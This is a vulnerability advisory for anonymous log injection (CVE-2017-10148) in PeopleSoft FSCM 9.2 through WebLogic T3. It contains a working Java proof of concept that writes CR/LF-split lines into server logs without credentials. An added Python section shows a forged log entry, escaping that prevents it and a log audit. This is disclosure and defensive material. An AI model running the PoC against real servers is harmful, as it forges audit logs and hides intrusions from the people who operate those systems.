Application: Oracle PeopleSoft
Versions Affected: PeopleSoft FSCM 9.2
Vendor: Oracle
Bug: Anonymous log injection
Reported: 16.03.2017
Vendor response: 17.03.2017
Date of Public Advisory: 18.07.2017
Reference: Oracle CPU July 2017
Authors: Vahagn Vardanyan (ERPScan)
Class: Log injection
Risk: High
Impact: Forged log events, hiding actions on the system
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2017-10148
CVSS Base Score v3: 5.8 / 10
CVSS Base Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N

| Metric | Value |
|---|---|
| AV: Attack Vector (related exploit range) | Network (N) |
| AC: Attack Complexity (required attack complexity) | Low (L) |
| PR: Privileges Required (level of privileges needed to exploit) | None (N) |
| UI: User Interaction (required user participation) | None (N) |
| S: Scope (change in scope due to impact caused to components beyond the vulnerable component) | Changed (C) |
| C: Impact to Confidentiality | None (N) |
| I: Impact to Integrity | Low (L) |
| A: Impact to Availability | None (N) |
Description: An unauthenticated attacker can send a specially crafted T3 request to the WebLogic server underneath PeopleSoft and write attacker-controlled data, including CR/LF sequences, into the server log files. This allows forging log entries and hiding the traces of other actions on the system.
Vulnerable Packages: PeopleSoft FSCM 9.2
Solution: To correct this vulnerability, apply Oracle CPU July 2017.
The following PoC obtains the WebLogic T3Services object over T3 without supplying any credentials and writes strings containing "\n\r" into the server log at every severity level:

```java
import java.util.Properties;
import javax.naming.Context;
import javax.naming.InitialContext;
import javax.rmi.PortableRemoteObject;
import weblogic.common.T3ServicesDef;

public class AnonLogInjection {
    // Requires the WebLogic client library (e.g. wlfullclient.jar) on the classpath.
    // The original declared several WebLogic-specific checked exceptions; a single
    // "throws Exception" keeps the PoC compiling without them.
    static boolean anon_log_injection(String PS_SERVER_IP, String PS_SERVER_PORT) throws Exception {
        Properties p = new Properties();
        p.put(Context.INITIAL_CONTEXT_FACTORY, "weblogic.jndi.WLInitialContextFactory");
        // No SECURITY_PRINCIPAL / SECURITY_CREDENTIALS are set: the lookup is anonymous.
        p.put(Context.PROVIDER_URL, "t3://" + PS_SERVER_IP + ":" + PS_SERVER_PORT);
        Context ctx = new InitialContext(p);
        Object obj = ctx.lookup("weblogic.common.T3Services");
        Object o = PortableRemoteObject.narrow(obj, T3ServicesDef.class);
        T3ServicesDef h = (T3ServicesDef) o;
        // Each message carries "\n\r", so its second half lands on a new line of the server log.
        h.log().log("ERPScan_1\n\rERPScan_2");
        h.log().info("ERPScan_3\n\rERPScan_4");
        h.log().error("ERPScan_5\n\rERPScan_6");
        h.log().warning("ERPScan_7\n\rERPScan_8");
        h.log().debug("ERPScan_9\n\rERPScan_10");
        return false;
    }

    public static void main(String[] args) throws Exception {
        anon_log_injection(args[0], args[1]);
    }
}
```
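As an added example that is not part of the ERPScan advisory, the Python below shows what a "\n\r" payload like the one in the PoC does to a WebLogic-style server log, the escaping a log writer should apply before a message reaches disk (the hardened form beside the vulnerable one), and a shape-based audit over sample log lines that flags records cut by an injected line break. The record layout imitates WebLogic's `####<date> <severity> <subsystem> ... <message>` format; the host, server and thread names, the message IDs and every log line are constructed for this example, not captured from a real PeopleSoft or WebLogic system.

```python
"""Added example (not from the ERPScan advisory): CRLF log injection against a
WebLogic-style server log, the escaping that prevents it, and an audit that
spots records split by an injected line break. All log lines are constructed."""
import re

# A WebLogic-style record starts with "####<"; following physical lines belong
# to the same record (legitimately only when the message is a stack trace).
RECORD_START = re.compile(r"^####<")

# Continuation lines a stack trace legitimately produces, plus the lone ">"
# that closes a multi-line message field.
LEGIT_CONTINUATION = re.compile(
    r"^(\s+at \S.*|Caused by: .*|\s+\.\.\. \d+ more|[\w.$]+(?:Exception|Error)\b.*|>)$"
)

# Control characters that must never reach a log writer unescaped.
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")
_NAMED_ESCAPES = {"\n": "\\n", "\r": "\\r", "\t": "\\t"}


def sanitize_log_message(message: str) -> str:
    """Escape CR, LF and other control characters so a message can neither end
    the current record early nor start a forged one on a new line."""
    return CONTROL_CHARS.sub(
        lambda m: _NAMED_ESCAPES.get(m.group(), "\\x%02x" % ord(m.group())), message
    )


def format_record(message: str, escape: bool = True, severity: str = "Info") -> str:
    """One WebLogic-style record (constructed fields). escape=False reproduces the
    vulnerable behaviour (message written verbatim); escape=True is the hardened form."""
    body = sanitize_log_message(message) if escape else message
    return (
        f"####<Jul 18, 2017 10:17:45 AM UTC> <{severity}> <Common> <host1> <PIA> "
        f"<ExecuteThread: '1'> <<anonymous>> <> <> <1500373065517> <BEA-000000> <{body}>"
    )


def split_records(log_text: str) -> list:
    """Group physical lines into records: a line starting with ####< opens a
    record, any other line continues the previous one."""
    records = []
    for line in log_text.splitlines():
        if RECORD_START.match(line) or not records:
            records.append([line])
        else:
            records[-1].append(line)
    return records


def audit_records(log_text: str) -> dict:
    """Map record index -> reasons for records whose shape betrays an injected
    line break: a continuation line that is not stack-trace shaped, or a
    single-line record whose <message> field was never closed."""
    suspicious = {}
    for i, rec in enumerate(split_records(log_text)):
        head, tail = rec[0], rec[1:]
        reasons = []
        if tail:
            bad = [c for c in tail if not LEGIT_CONTINUATION.match(c)]
            if bad:
                reasons.append(f"continuation line is not stack-trace shaped: {bad[0]!r}")
        elif not head.rstrip().endswith(">"):
            reasons.append("message field not closed: record cut by an injected line break")
        if reasons:
            suspicious[i] = reasons
    return suspicious


# Constructed sample log: a clean record, a genuine stack trace, the record the
# PoC's "ERPScan_1\n\rERPScan_2" call produces on an unpatched server, and a
# record whose payload forges a whole extra "User PS logged out" entry.
SAMPLE_LOG = (
    "####<Jul 18, 2017 10:15:32 AM UTC> <Info> <Security> <host1> <PIA> <ExecuteThread: '0'> "
    "<<WLS Kernel>> <> <> <1500372932123> <BEA-090905> <Disabling the CryptoJ JCE Provider "
    "self-integrity check for better startup performance.>\n"
    "####<Jul 18, 2017 10:16:01 AM UTC> <Error> <HTTP> <host1> <PIA> <ExecuteThread: '3'> "
    "<<anonymous>> <> <> <1500372961004> <BEA-101020> <Servlet failed with an Exception\n"
    "java.lang.NullPointerException\n"
    "\tat psft.pt8.psc.service(psc.java:123)\n"
    "\t... 12 more\n"
    ">\n"
    + format_record("ERPScan_1\n\rERPScan_2", escape=False) + "\n"
    + format_record("x\n####<Jul 18, 2017 10:18:02 AM UTC> <Notice> <Security> <host1> <PIA> "
                    "<ExecuteThread: '1'> <<WLS Kernel>> <> <> <1500373082009> <BEA-090078> "
                    "<User PS logged out>", escape=False) + "\n"
)

if __name__ == "__main__":
    for idx, reasons in audit_records(SAMPLE_LOG).items():
        print(f"record {idx}: {'; '.join(reasons)}")
    print("hardened record:", format_record("ERPScan_1\n\rERPScan_2"))
```

Running the script flags records 2 and 3: the PoC payload leaves an unclosed `<ERPScan_1` line followed by a non-stack-trace continuation, and the forged entry leaves the preceding record's message field unclosed. The forged line itself (record 4) is syntactically perfect, and a more careful payload can close the message field before the injected newline so that no record looks malformed at all. The audit therefore only catches naive payloads; the actual fix is the July 2017 CPU, with escaping of control characters in whatever writes the log and T3 reachable only from trusted networks as the defence-in-depth layers.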